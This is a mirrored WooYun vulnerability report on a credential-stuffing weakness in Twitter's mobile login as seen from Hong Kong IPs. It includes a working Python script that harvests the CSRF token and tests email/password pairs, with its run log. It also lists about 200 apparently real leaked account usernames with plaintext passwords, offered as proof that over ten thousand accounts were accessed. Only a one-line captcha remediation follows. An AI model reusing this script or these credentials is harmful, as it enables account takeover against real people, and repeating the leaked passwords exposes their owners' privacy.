乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-29: 细节已通知厂商并且等待厂商处理中 2016-04-01: 厂商已经确认,细节仅向厂商公开 2016-04-11: 细节向核心白帽子及相关领域专家公开 2016-04-21: 细节向普通白帽子公开 2016-05-01: 细节向实习白帽子公开 2016-05-16: 细节向公众公开
Uber优步撞库攻击,富有中国特色的业务缺陷http://www.wooyun.org/bugs/wooyun-2010-0188046该报告描述了twitter在处理用户登录过程中,未考虑属于同一个地区的单个请求IP ( 貌似把海外地区的全部城市都划分为一个国家地区了,比如香港),重复尝试登录多个不同用户的撞库场景(如果地区和历史不同,登录成功后 ,会提示一个可疑活动侵害提示)。一个邮箱账号,可尝试使用5个已知密码,不然IP会被标示风险,如果使用不同的邮箱账号,IP就能持续使用尝试撞库。
登录接口https://**.**.**.**/login 服务器根据用户User-Agent中的浏览器版本和语言,自适应的推送相对应的后台接口当UA设置为Nokie N9,IP所在地香港,服务端对应的接口内容如下
user-agent : Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13accept-language : zh-CN,zh;q=0.8,en;q=0.6
### 登录验证页面源码```
<div id="main_content"><div class="signup-body"><form action="/sessions" method="post" class="signin-form"><span class="m2-auth-token"><input name="authenticity_token" type="hidden" value="6a56481e83a480a80eaa5fbddd7abb48"/></span><input type="hidden" name="remember_me" value="1"/><input type="hidden" name="wfa" value="1"/><input type="hidden" name="redirect_after_login" value="/home?login=1459222974246" /><fieldset class="inputs"><div class="signup-container"><div class="signup-field"><input autocapitalize="off" autocorrect="off" class="signup-input" id="session[username_or_email]" name="session[username_or_email]" placeholder="電話、電子郵件或使用者名稱" type="text" value=""></div></div><div class="signup-container"><div class="signup-field"><input class="signup-input" id="session[password]" name="session[password]" placeholder="密碼" type="password" value=""></div></div></fieldset><div class="signup-button"><button class="signup button" id="signupbutton" type="submit">登入</button></div></form></div>
### 登录流程1. 访问最精简的移动端登录页面https://**.**.**.**/login2. 获取登录页面内隐藏的authenticity_token3. 拼接登录表单(FORM),尝试撞库4. 根据返回结果页面,判断是否登录成功5. 如果服务器的返回结果为Status Code : 302https://**.**.**.**/login/error?username_or_email=email@**.**.**.**6. 判断是否包含如下内容 : 你輸入的電子郵件和密碼與我們的記錄不符
Starting check ring05h@**.**.**.** : 123456Starting check ring07h@**.**.**.** : 123456Starting check ring08h@**.**.**.** : 123456Starting check ring04h@**.**.**.** : truepasswordring04h@**.**.**.** truepassword login success.call destroy()Starting check ring09h@**.**.**.** : 123456Starting check ring10h@**.**.**.** : 123456Starting check ring11h@**.**.**.** : 123456Starting check ring12h@**.**.**.** : 123456Starting check ring13h@**.**.**.** : 123456Starting check ring14h@**.**.**.** : 123456Starting check ring15h@**.**.**.** : 123456Starting check ring16h@**.**.**.** : 123456Starting check ring17h@**.**.**.** : 123456Starting check ring18h@**.**.**.** : 123456[Finished in 58.2s]
POC : http://**.**.**.**/src/twitter.py
#!/usr/bin/env python# encoding: utf-8# email: ringzero@**.**.**.**import jsonimport reimport requestsimport timeimport requests.packages.urllib3requests.packages.urllib3.disable_warnings()requests = requests.Session()headers = { 'User-Agent': 'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13', 'accept-language': 'zh-CN,zh;q=0.8,en;q=0.6', 'origin': 'https://**.**.**.**', 'pragma': 'no-cache', 'referer': 'https://**.**.**.**/login', 'upgrade-insecure-requests': '1',}class Twitter_Login(object): """docstring for Twitter_Login""" def __init__(self): super(Twitter_Login, self).__init__() self.website = 'https://**.**.**.**' def parser_token(self, content): auth_token = re.search('authenticity_token" type="hidden" value="(.*?)"/>', content) return auth_token.group(1) if auth_token else None def init_token(self): url = '{0}/login'.format(self.website) content = requests.get(url, headers=headers, allow_redirects=True).content return content def parser_success(self, email, content): if email in content or '记录不匹配' in content: return False else: return True def session(self, token, email, password): payload = { 'authenticity_token' : token, 'session[username_or_email]' : email, 'session[password]': password, 'remember_me' : 1, 'wfa' : 1, 'commit' :'登入', } url = '{0}/sessions'.format(self.website) result = requests.post(url, headers=headers, data=payload, allow_redirects=True) return result def run(self): session_content = self.init_token() userdict = [ 'ring05h@**.**.**.**:123456', 'ring07h@**.**.**.**:123456', 'ring08h@**.**.**.**:123456', 'ring04h@**.**.**.**:truepassword', 'ring09h@**.**.**.**:123456', 'ring10h@**.**.**.**:123456', 'ring11h@**.**.**.**:123456', 'ring12h@**.**.**.**:123456', 'ring13h@**.**.**.**:123456', 'ring14h@**.**.**.**:123456', 'ring15h@**.**.**.**:123456', 'ring16h@**.**.**.**:123456', 'ring17h@**.**.**.**:123456', 'ring18h@**.**.**.**:123456',] for combo in userdict: token = self.parser_token(session_content) if token is not None: email, password = combo.split(':') print 'Starting check {0} : {1}'.format(email, password) session_content = self.session(token, email, password).content if self.parser_success(email, session_content): print email, password, 'login success.' self.destroy() time.sleep(2) session_content = self.init_token() time.sleep(3) def destroy(self): print 'call destroy()' url = '{0}/account'.format(self.website) content = requests.get(url, headers=headers, allow_redirects=True).content token = self.parser_token(content) if token is not None: # destroy logout url = '{0}/session/destroy'.format(self.website) payload = { 'authenticity_token': token, 'commit': '登出' } result = requests.post(url, headers=headers, data=payload, allow_redirects=True) twitter = Twitter_Login()twitter.run()
通过数据库匹配香港地区泄露的邮箱+密码,尝试登陆,成功了上万个账号,列出200个证明
notthing101@**.**.**.**:93013676://**.**.**.**/:1:16:2staring_789@**.**.**.**:963258://**.**.**.**/:7:0:1ho165948@**.**.**.**:165948://**.**.**.**/:0:1:0jasonsheung@**.**.**.**:jason488://**.**.**.**/:0:0:1[email protected]:19901111://**.**.**.**/:5:22:5lovecelest@**.**.**.**:331080://**.**.**.**/:0:22:1[email protected]:19940223://**.**.**.**/:0:0:0marcotsm@**.**.**.**:572198://**.**.**.**/:0:0:1siu_sa_al_mi@**.**.**.**:82468246://**.**.**.**/:0:0:0qkling@**.**.**.**:111ling://**.**.**.**/:1:3:1maggie_yklorn@**.**.**.**:630123://**.**.**.**/:4:20:0yman9876@**.**.**.**:27786999://**.**.**.**/:5:1:0ivan0984@**.**.**.**:16101610://**.**.**.**/:0:8:4karen3e40@**.**.**.**:011169://**.**.**.**/:8:18:1thkwok818@**.**.**.**:434200://**.**.**.**/:1:0:5ahhoi2007@**.**.**.**:19770906://**.**.**.**/:1:15:3pwan1310@**.**.**.**:336699pw://**.**.**.**/:0:3:0jameslee@**.**.**.**:selfcontrol://**.**.**.**/:5:1:0cloud_2525@**.**.**.**:1484468://**.**.**.**/:0:9:0hollyinx_gazerock@**.**.**.**:yusuke://**.**.**.**/:4:121:19hw317hhh@**.**.**.**:27170271://**.**.**.**/:6:0:0apple_vic@**.**.**.**:yanple91://**.**.**.**/:17:25:9choas666@**.**.**.**:1234567890://**.**.**.**/:2:0:0b1233211234567@**.**.**.**:08020802://**.**.**.**/:0:1:0hoitung112@**.**.**.**:911102://**.**.**.**/:2:11:3pm1055_siudin@**.**.**.**:24266477://**.**.**.**/:0:0:1yanyanwinter@**.**.**.**:120012://**.**.**.**/:14:11:8[email protected]:27787269://**.**.**.**/:8:66:0singson1986@**.**.**.**:719419://**.**.**.**/:0:1:0cheukngai918@**.**.**.**:pls32013://**.**.**.**/:35:0:0krosslam@**.**.**.**:woodstock://**.**.**.**/:0:1:1yssum614@**.**.**.**:300312://**.**.**.**/:13:8:1johnon7@**.**.**.**:Z960624://**.**.**.**/:19:43:6cyy-3-@**.**.**.**:246810://**.**.**.**/:1:3:0chi731@**.**.**.**:3782428://**.**.**.**/:0:0:0[email protected]:03150315://**.**.**.**/:10:2:1leifuson@**.**.**.**:999999://**.**.**.**/:0:0:0coffee2653@**.**.**.**:26538767://**.**.**.**/:65:1:1[email protected]:229831://**.**.**.**/:0:4:5filetofish85@**.**.**.**:303160://**.**.**.**/:299:0:0772593150@**.**.**.**:h53545354://**.**.**.**/:0:0:0williamhui1998@**.**.**.**:ilcclm://**.**.**.**/:1:18:3investwhat@**.**.**.**:898110://**.**.**.**/:2:3:0muingotung_kaitung@**.**.**.**:65046244://**.**.**.**/:0:34:1tou1234567@**.**.**.**:132567890://**.**.**.**/:4:15:7yoursphoebe@**.**.**.**:7926058://**.**.**.**/:0:7:1wuyukfaat1993@**.**.**.**:y3184623://**.**.**.**/:0:2:1darli91912@**.**.**.**:19921109://**.**.**.**/:0:17:4spa_turbo@**.**.**.**:iloveu://**.**.**.**/:3:2:1gt83b64@**.**.**.**.tw:gilu6738://**.**.**.**/:Tweets:Following:Followerssmartdr.ken@**.**.**.**:21234086://**.**.**.**/:7:3:0shadowkisze@**.**.**.**:170858://**.**.**.**/:17:48:15viviankaki@**.**.**.**:130394://**.**.**.**/:0:15:0climbc50579@**.**.**.**:19950925://**.**.**.**/:42:59:17csc1128@**.**.**.**:raymond1://**.**.**.**/:1:5:4mayuen@**.**.**.**:950610://**.**.**.**/:5:21:1andyweang@**.**.**.**.tw:123377134://**.**.**.**/:0:0:0sumlok@**.**.**.**:26630004://**.**.**.**/:0:0:2ruby_hui999@**.**.**.**:168888://**.**.**.**/:0:2:1chun_9314@**.**.**.**:26723685://**.**.**.**/:24:2:1laisamuelki@**.**.**.**:8211123://**.**.**.**/:60:34:10falcocreate@**.**.**.**:417417://**.**.**.**/:1:0:0nineboys2002@**.**.**.**:935350://**.**.**.**/:3:1:0hang_drumz@**.**.**.**:ilovegod://**.**.**.**/:39:0:0bbeennsshhii@**.**.**.**:candychan://**.**.**.**/:1:4:3ting_0830@**.**.**.**:35257387://**.**.**.**/:117:26:0llw.gary@**.**.**.**:z1774329://**.**.**.**/:Tweets:Following:Followerskimmy_0208@**.**.**.**:26640684://**.**.**.**/:0:0:0justtosayhi@**.**.**.**:yimlay://**.**.**.**/:Tweets:Following:Followerslausuihang@**.**.**.**:asdfghjkl://**.**.**.**/:0:3:0carol_kwan116@**.**.**.**:1161988://**.**.**.**/:0:0:0samuelfung50@**.**.**.**:007973://**.**.**.**/:2:2:5kenneth6562@**.**.**.**:282958://**.**.**.**/:2:0:0yinchunghui@**.**.**.**:19860526://**.**.**.**/:1:6:3seventh_fleet1943@**.**.**.**:iodine://**.**.**.**/:1:1:0rachelpig2005@**.**.**.**:pigpig://**.**.**.**/:4:2:0yeungws2@**.**.**.**:jennifer1://**.**.**.**/:0:0:0crazyrecall@**.**.**.**.tw:8632404://**.**.**.**/:61:324:2sumsum678@**.**.**.**:678678://**.**.**.**/:0:1:0FLorence_1120@**.**.**.**:3516197://**.**.**.**/:22:6:3ccc24hk@**.**.**.**:15771577://**.**.**.**/:0:19:3billy_paklam@**.**.**.**:beckham7://**.**.**.**/:2:0:1applekiki628@**.**.**.**:buddhist://**.**.**.**/:1:1:0tiger19951219@**.**.**.**:lollipop520://**.**.**.**/:3:24:6imaryo@**.**.**.**:316500://**.**.**.**/:4:10:1mandy2102@**.**.**.**:manman21://**.**.**.**/:19:14:4yychau0212@**.**.**.**:601643://**.**.**.**/:0:20:2sheging@**.**.**.**:c00632://**.**.**.**/:0:0:3jackkwokho@**.**.**.**:11683611://**.**.**.**/:419:71:19wlcgz0582@**.**.**.**:67600350://**.**.**.**/:5:69:7amiwawa9032003@**.**.**.**:beyonce://**.**.**.**/:0:20:4loconnie@**.**.**.**:777999://**.**.**.**/:32:1:0nicoyau1104@**.**.**.**:19911104://**.**.**.**/:6:1:0yau1101@**.**.**.**:771101://**.**.**.**/:3546:2:0victrix10nike@**.**.**.**:870715://**.**.**.**/:337:6:2gracetwk@**.**.**.**:8299885://**.**.**.**/:0:0:4[email protected]:367409://**.**.**.**/:1:1:0gemmalau2@**.**.**.**:1996515://**.**.**.**/:11:32:2jeffreyau1995@**.**.**.**:bb123456://**.**.**.**/:25:7:3terter715@**.**.**.**:lovingu://**.**.**.**/:3:6:13diamonmichelle@**.**.**.**:19940914://**.**.**.**/:17:162:24hoganle1314@**.**.**.**:00000333://**.**.**.**/:1:1:2ching-125@**.**.**.**:lillian://**.**.**.**/:0:8:4tingtingac@**.**.**.**:titiac://**.**.**.**/:1:0:0rachels0810@**.**.**.**:810211://**.**.**.**/:0:0:0winwyi_tang@**.**.**.**:230456://**.**.**.**/:28:24:10middle817@**.**.**.**:23881271://**.**.**.**/:0:42:2erichin1992@**.**.**.**:q132456://**.**.**.**/:53:3:0kei.322@**.**.**.**:03220617://**.**.**.**/:39:7:4zerovack@**.**.**.**:7x4s9tev://**.**.**.**/:1:2:1ray1234_2000@**.**.**.**:198212://**.**.**.**/:0:0:0ellischan22001@**.**.**.**:26760311://**.**.**.**/:1:0:0akindosky@**.**.**.**:7291314://**.**.**.**/:0:0:0chanj910@**.**.**.**:091083://**.**.**.**/:0:0:0lxc5089@**.**.**.**:21820099://**.**.**.**/:7:0:1kyo2047@**.**.**.**:a84371c1://**.**.**.**/:266:17:2smmen3@**.**.**.**:487968://**.**.**.**/:0:6:0kuuipokao@**.**.**.**:129129://**.**.**.**/:1:22:0b278755006@**.**.**.**:2006712522://**.**.**.**/:6:12:0yancheung2141@**.**.**.**:2141785://**.**.**.**/:0:1:0badboy_baby1314@**.**.**.**:babyyan1314://**.**.**.**/:0:0:0konicacheung@**.**.**.**:casillas://**.**.**.**/session/new:2:20:6jlwhvh@**.**.**.**:vicky00://**.**.**.**/:0:0:0chisanmok@**.**.**.**:mok123://**.**.**.**/:164:2:0mini_et_kiwi@**.**.**.**:ling00://**.**.**.**/:10:20:1nicoleytyan@**.**.**.**:19921118a://**.**.**.**/:4:5:0goalcaught@**.**.**.**:19790417://**.**.**.**/:0:0:0alex_leung2412@**.**.**.**:122491://**.**.**.**/:33:13:0wfw7459@**.**.**.**:2988556://**.**.**.**/:0:20:1aplong.long@**.**.**.**:550718://**.**.**.**/:2:1:0cokes1994128@**.**.**.**:245125://**.**.**.**/:5:1:0vsmos@**.**.**.**:v720v720://**.**.**.**/:85:17:0kit90920@**.**.**.**:19900920://**.**.**.**/:59:3:0christychan0807@**.**.**.**:124818://**.**.**.**/:3:2:4ryan_tsui_wy@**.**.**.**:112693://**.**.**.**/:0:2:9raymondkwok9595@**.**.**.**:19819595://**.**.**.**/:0:1:1barryhung2000@**.**.**.**:120371://**.**.**.**/:35:7:5marlui22@**.**.**.**:2625088://**.**.**.**/:118:62:7ellepig114@**.**.**.**:iloveyou4ever://**.**.**.**/:183:28:15hcbf22142@**.**.**.**:19833891://**.**.**.**/:0:19:0leewai01@**.**.**.**:54995499://**.**.**.**/:0:4:1yiufai1988@**.**.**.**:19051905://**.**.**.**/:1:0:0kelvintofai@**.**.**.**:11221215://**.**.**.**/:0:2:0yuen_tsang5f@**.**.**.**:081586://**.**.**.**/:0:9:0tw.test@**.**.**.**:mfokrythu://**.**.**.**/:0:3:0kaphwan0@**.**.**.**:12241224://**.**.**.**/:1:0:0ringo06161@**.**.**.**:ringo1994://**.**.**.**/:20:7:0tszching929@**.**.**.**:583370://**.**.**.**/:36:45:5kcwcyber@**.**.**.**:888999://**.**.**.**/:0:4:2msble@**.**.**.**:717946://**.**.**.**/:0:1:1wong_03032000@**.**.**.**:135790://**.**.**.**/:22:1:0julian01017@**.**.**.**:polaroid://**.**.**.**/:16:22:7gk6899@**.**.**.**:090984://**.**.**.**/:0:17:3ma0319368202@**.**.**.**:ma0319://**.**.**.**/:0:0:7hiuting724@**.**.**.**:24785455://**.**.**.**/:120:107:10chenyichenn@**.**.**.**:123456://**.**.**.**/:2:3:0keik1107@**.**.**.**:046106://**.**.**.**/:4:0:0yeung_wai58462@**.**.**.**:108695://**.**.**.**/:36:6:0dovejj_512@**.**.**.**:59876078://**.**.**.**/:0:1:0to1118@**.**.**.**:webpass://**.**.**.**/:1:6:0ideepvluk@**.**.**.**:768439://**.**.**.**/:0:0:0chungtt19852002@**.**.**.**:19851016://**.**.**.**/:435:1628:13wai1021@**.**.**.**:hammett1021://**.**.**.**/:5:79:12jasmine0207@**.**.**.**:12270207://**.**.**.**/:92:24:23wfh0805@**.**.**.**:111111://**.**.**.**/:15:0:1jerryashley1982@**.**.**.**:041182://**.**.**.**/:2:1:7davis.tcl@**.**.**.**:14021981://**.**.**.**/:1:13:1tsoi_lee@**.**.**.**:fuckoff1://**.**.**.**/:0:0:1jameschangwk@**.**.**.**.cn:fuckyou000://**.**.**.**/:0:1:0yyy221@**.**.**.**:123yyy://**.**.**.**/:0:20:2blackdog91428@**.**.**.**:7833643://**.**.**.**/:456:1362:10hwpoonjackie2007@**.**.**.**:007008009://**.**.**.**/:13:0:0sharycat0428@**.**.**.**:510428://**.**.**.**/:0:35:1ohoj@**.**.**.**:102058://**.**.**.**/:0:0:0amyyyyy402@**.**.**.**:chemistry://**.**.**.**/:18:2:2m5864980@**.**.**.**.tw:a200486120://**.**.**.**/:1:387:1siuwaikitricky@**.**.**.**:6305645://**.**.**.**/:0:1:0hahaha3333@**.**.**.**:choitszngong://**.**.**.**/:110:9:0sing_926@**.**.**.**:singsing://**.**.**.**/:10:1:0hkgavin999@**.**.**.**:92445823://**.**.**.**/:4:0:0hallelujahbaby@**.**.**.**:199072://**.**.**.**/:0:4:0wilsom2009@**.**.**.**:01071990://**.**.**.**/:0:1:1[email protected]:22648792://**.**.**.**/:61:17:3luck_box2006@**.**.**.**:874605://**.**.**.**/:0:0:0afdkwok@**.**.**.**:AKwok11://**.**.**.**/:12:15:4lowbsonson@**.**.**.**:92576291://**.**.**.**/:6:3:1frankietang1991@**.**.**.**:fghtyabn://**.**.**.**/:3:29:3assbsb258258@**.**.**.**:20020000://**.**.**.**/:1:1:0hingyuen1188@**.**.**.**:4148412://**.**.**.**/:1:10:0cst1124@**.**.**.**:p0515977://**.**.**.**/:11:2:0kanix829@**.**.**.**:19880829://**.**.**.**/:0:21:0panpeter@**.**.**.**:332089://**.**.**.**/:0:1:0h810809@**.**.**.**:et2212://**.**.**.**/:0:3:0elvis_1017@**.**.**.**:19901219://**.**.**.**/:0:0:01313tk@**.**.**.**:a66886688://**.**.**.**/:0:2:3billy999111@**.**.**.**:24515156://**.**.**.**/:15:8:7coco926hk@**.**.**.**:0115061://**.**.**.**/:1:22:3James01102@**.**.**.**:wing1c20://**.**.**.**/:2:13:1wayne618825@**.**.**.**:618825://**.**.**.**/:1:8:3nicole.liew@**.**.**.**:145264://**.**.**.**/:1:0:0gladyschow95@**.**.**.**:Y4677364://**.**.**.**/:0:1:2lamz0725@**.**.**.**:sinnung://**.**.**.**/:1:0:6
# 加入图片验证码,而不是使用简单的csrf_token# 复杂的业务场景设计权衡
危害等级:高
漏洞Rank:12
确认时间:2016-04-01 17:29
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无